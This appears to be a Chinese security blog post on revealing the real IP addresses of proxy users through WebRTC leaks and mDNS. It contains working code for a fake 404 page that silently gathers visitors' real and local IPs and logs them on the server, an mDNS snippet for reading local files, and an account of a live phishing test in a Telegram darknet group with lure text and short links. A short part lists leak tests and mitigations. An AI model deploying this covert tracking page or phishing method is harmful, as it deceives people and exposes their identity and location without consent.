如果你喜欢我的文章,欢迎关注公众号:安全女巫
转载请注明出处:https://mp.weixin.qq.com/s/zRe0oxFtteBs93bfrEeesA
简介
在TG群中获取用户真实IP地址是许多打击网络犯罪和网络安全团队想要解决的难题和目标。虽然该手法成功率不高,只能作为一种尝试或者加入到现有安全产品中作为一个小功能,但仍然有很多人对这方面的技术和方法感兴趣。
本文的重点在于分享Webrtc和mDNS在实际场景中的应用,教你如何轻松实现获取使用代理的主机IP,并附上相关代码,帮助读者更好地理解和实践。
场景介绍
如果你的访问者使用的是xray、v2rayN、Clash等代理软件,并且不是全链路模式,恭喜你很可能可以获取到代理信息。
如果使用WG全代理的模式,基本是不会泄露用户真实IP地址的。
实景演示
本文通过Webrtc的方式,获取访问人本地IP,并展开讲mDNS获取本地资源,同时公布出笔者自己的代码,加上一部分的实景演练,方便读者能直观了解和得到结论。
实战演练部分是通过tg群到暗网交流平台进行钓鱼。获取群内成员的真实IP信息。
我们怎么通过在线检测自己的代理是否存在问题?
https://browserleaks.com/webrtch ttps://www.expressvpn.com/webrtc-leak-test https://ip8.com/webrtc-test 上列网站都可以检测出是否存在,大家可以关闭自己浏览器webrtc功能, 或者下载webRTC leak shield插件进行防护
WEBRTC检测结果
WebRTC的整个链路实现过程:
信令交换:在通话开始之前,浏览器要交换信令以建立连接。信令包括本地和远程描述,以及ICE候选项。本地描述包括本地媒体流的编解码器和分辨率等信息,远程描述包括远程媒体流的编解码器和分辨率等信息。ICE候选项是一些可能的IP地址和端口号,用于在NAT和防火墙之间建立连接。
媒体协商:浏览器之间通过信令交换协商媒体参数,包括编解码器、分辨率、帧率、比特率等。
媒体采集:浏览器会从摄像头和麦克风中获取音视频流,并进行编码。
媒体传输:WebRTC使用RTP协议传输媒体流。RTP协议是面向包的协议,可以在网络上传输音视频流。同时,WebRTC还使用SRTP协议对RTP进行加密和解密。
NAT穿透:由于大多数设备都位于NAT和防火墙之后,WebRTC需要使用STUN和TURN服务器来穿越NAT和防火墙。
媒体解码:接收端浏览器会对接收到的媒体流进行解码,并将解码后的数据交给浏览器的媒体播放器进行播放。
构建复现代码
自己本地构建Webrtc代码:
index.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>WebRTC泄露检测</title>
</head>
<body>
<h1>WebRTC泄露检测结果</h1>
<ul id="IPLeak"></ul>
<br><br>
<h2>访问IP地址</h2>
<p id="IP"></p>
<h2>主机名</h2>
<p id="Hostname"></p>
<script>
function findIP(onNewIP) {
var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}),
noop = function() {},
localIPs = {},
ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
key;
function ipIterate(ip) {
if (!localIPs[ip]) onNewIP(ip);
localIPs[ip] = true;
}
pc.createDataChannel("");
pc.createOffer(function(sdp) {
sdp.sdp.split('\n').forEach(function(line) {
if (line.indexOf('candidate') < 0) return;
line.match(ipRegex).forEach(ipIterate);
});
pc.setLocalDescription(sdp, noop, noop);
}, noop);
pc.onicecandidate = function(ice) {
if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
};
}
function addIP(ip) {
var li = document.createElement('li');
li.textContent = ip;
document.getElementById("IPLeak").appendChild(li);
}
fetch('https://api.ipify.org/?format=json')
.then(response => response.json())
.then(data => {
var ip = data.ip;
document.getElementById("IP").textContent = ip;
});
findIP(addIP);
fetch('https://ipinfo.io/json?token=4cd59660789f30')
.then(response => response.json())
.then(data => {
var hostname = data.hostname;
document.getElementById("Hostname").textContent = hostname;
});
</script>
</body>
</html>
代码构成后,访问记录:
本地的基础IP信息
该记录中的内容,是为我本地IP与代理使用IP。
既然真个过程已经完全复现。现在我们来实战一下。
钓鱼页面
为了欺骗点击用户,前端可以制作一个假页面,并配合钓鱼文案的生成。WebRTC代码将在后端执行。
这里推荐我朋友写的一款商业产品【姜太公钓鱼】一款为企业量身定做的甲方内部钓鱼平台。
为了不引起别人的怀疑,制成一个404页面是最保险。只需要一个HTML文件就可以搞定。
如果想要加入更多功能,可以将页面制作成PHP文件。不过如果只需要加入JS,就没有必要这么麻烦了,只需要在页面中加入JS即可,php文件可以伪装成默认页面的形式,笔者没有深入优化,感兴趣的朋友可以自行研究,巫巫这里提供代码给大家。
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$ip = $_SERVER['REMOTE_ADDR'];
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$timestamp = date('Y-m-d H:i:s');
$ipleak = $_POST['ipleak'];
$data = "IP: {$ip} | Hostname: {$hostname} | IPLeak: {$ipleak} | Timestamp: {$timestamp}\n";
$file = "visitors_log.txt";
file_put_contents($file, $data, FILE_APPEND);
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>The Page not Found-找不到你要访问的页面</title>
</head>
<body>
<h1>The Page not Found-找不到你要访问的页面</h1>
<ul id="IPLeak" style="display:none;"></ul>
<script>
function findIP(onNewIP) {
var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}),
noop = function() {},
localIPs = {},
ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
key;
function ipIterate(ip) {
if (!localIPs[ip]) onNewIP(ip);
localIPs[ip] = true;
}
pc.createDataChannel("");
pc.createOffer(function(sdp) {
sdp.sdp.split('\n').forEach(function(line) {
if (line.indexOf('candidate') < 0) return;
line.match(ipRegex).forEach(ipIterate);
});
pc.setLocalDescription(sdp, noop, noop);
}, noop);
pc.onicecandidate = function(ice) {
if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
};
}
function addIP(ip) {
var li = document.createElement('li');
li.textContent = ip;
document.getElementById("IPLeak").appendChild(li);
}
findIP(addIP);
function sendDataToServer() {
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "", true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
var ipleak = Array.from(document.querySelectorAll('#IPLeak li')).map(li => li.textContent).join(', ');
xhttp.send("ipleak=" + ipleak);
}
findIP(function (ip) {
addIP(ip);
sendDataToServer();
});
</script>
</body>
</html>
本地访问结果
操作将会在本地生成txt.查看本地txt生成记录,记录将每一次的访问记录追加到visitors_log.
出海电鱼
本次使用tg暗网交流群进行钓鱼测试
为了优化一下,我们将钓鱼网页简单加工一下,加上话术。
网页伪装+话术+短链接
现在去tg群撒网打鱼。使用长安不夜城暗网群。
构建一个页面
现在我们倒数五个数
不一会儿的功夫大概有30个人访问。
点击率还是很高,笔者只是简单包装,在一个群组发了消息。
更多的玩法,需要读者去思考挖掘。巫巫给大家做个话题切入。
介绍mDNS,WebRTC host的实现
文章后面继续科普mDNS实际应用与基础信息分享。
什么是mDNS
mDNS指的是多播DNS,它是一种去中心化的解决方案。
在WebRTC的场景下,通常情况下,通过STUN服务器来获取到设备的公网IP。而mDNS的目的是在局域网中发现和解析设备。
为了保护用户隐私,一些浏览器在WebRTC实现中已经引入了mDNS来替换局域网IP。这意味着,对等连接会使用一个随机生成的mDNS主机名来代替设备的局域网IP。
mDNS会有什么安全风险
隐私泄露:mDNS可能会泄漏设备的主机名、IP地址和设备类型等信息。虽然这些信息主要用于本地网络中的设备发现,但在某些情况下,恶意网站可能会利用WebRTC技术获取这些信息,从而窃取用户的隐私。
安全风险:mDNS可能会带来一定的安全风险,因为它在网络中广播设备信息。攻击者可能会利用这些信息发起针对特定设备的攻击。虽然mDNS主要用于本地网络,但恶意网站或攻击者可能会尝试通过WebRTC获取这些信息,从而发起针对用户设备的攻击。
跨站请求伪造(CSRF)攻击:mDNS可能会暴露内部网络设备的IP地址,这可能使得攻击者更容易发起跨站请求伪造(CSRF)攻击。攻击者可能会利用用户的设备信息发起针对内部网络的攻击,从而窃取或篡改网络设备的数据。
大体的访问图:
访问网站,生成mDNS主机名:
https://niespodd.github.io/webrtc-local-ip-leak/ http://net.ipcalf.com/
生成mDNS
然后我们就可以通过mDNS这个地址访问自己本地内容。
这个xxxxxxxx-xxxx-xxx-xxxx-xxxxxx.local是什么呢?看着是不是IPv6地址,其实它是UUIDv4,是URL.createObjectURL()得到的域名。
WebRTC悄悄地向操作系统注册了mDNS的域名,所以我可以通过它访问本地主机。
WebRTC在使用的过程中,都会调用没DNS来处理。
实现mDNS代码
<!doctype html>
<html><head>
<meta charset="utf-8">
<title>Network IP Address via ipcalf.com</title>
</head><body>
Your network IP is: <h1 id=list>-</h1> Make the locals proud.
<script>
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function () {
var rtc = new RTCPeerConnection({iceServers:[]});
if (1 || window.mozRTCPeerConnection) { // FF [and now Chrome!] needs a channel/stream to proceed
rtc.createDataChannel('', {reliable:false});
};
rtc.onicecandidate = function (evt) {
// convert the candidate to SDP so we can run it through our general parser
// see https://twitter.com/lancestout/status/525796175425720320 for details
if (evt.candidate) grepSDP("a="+evt.candidate.candidate);
};
rtc.createOffer(function (offerDesc) {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { console.warn("offer failed", e); });
var addrs = Object.create(null);
addrs["0.0.0.0"] = false;
function updateDisplay(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
document.getElementById('list').textContent = displayAddrs.join(" or perhaps ") || "n/a";
}
function grepSDP(sdp) {
var hosts = [];
sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
addr = parts[4],
type = parts[7];
if (type === 'host') updateDisplay(addr);
} else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7
var parts = line.split(' '),
addr = parts[2];
updateDisplay(addr);
}
});
}
})(); else {
document.getElementById('list').innerHTML = "<code>ifconfig | grep inet | grep -v inet6 | cut -d\" \" -f2 | tail -n1</code>";
document.getElementById('list').nextSibling.textContent = "In Chrome and Firefox your IP should display automatically, by the power of WebRTCskull.";
}
</script>
</body></html>
测试肯定不是目的,我们要让漏洞的可利用放大。
使用mDNS获取本地网络文件。
下面给出利用mDNS获取到的主机名进行本地资源test.txt获取:
实现代码如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>mDNS文件获取示例</title>
</head>
<body>
<h1>mDNS主机名下的test.txt文件内容</h1>
<p id="textContent"></p>
<script>
function fetchTestTxt(mdnsHostname) {
fetch(`http://${mdnsHostname}/visitors_log.php`)
.then(response => {
if (response.ok) {
return response.text();
} else {
throw new Error('无法访问test.txt文件。');
}
})
.then(data => {
document.getElementById("textContent").textContent = data;
})
.catch(error => {
console.error('发生错误:', error);
document.getElementById("textContent").textContent = '发生错误: 无法获取文件内容';
});
}
// 假设已知的mDNS主机名
const knownMDNS = "09491d48-45cf-4097-be7f-a1630bbd96e0.local";
fetchTestTxt(knownMDNS);
</script>
</body>
</html>
请将knownMDNS参数修改成自己获得到的mdns值,获取方式,请查看上面文章。visitors_log.php 为你要获取的主机名。
总结
本文通过Webrtc的方式,获取访问人本地IP,并展开讲mDNS获取本地资源,同时公布出笔者自己的代码,加上一部分的实景演练,方便读者能直观了解和得到结论。
实战演练部分是通过tg群到暗网交流平台进行钓鱼。获取群内成员的真实IP信息。
本文代码全部打包上传在网盘
关注公众号(安全女巫)后回复:tg钓鱼
本文作者:公众号:安全女巫
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/199003.html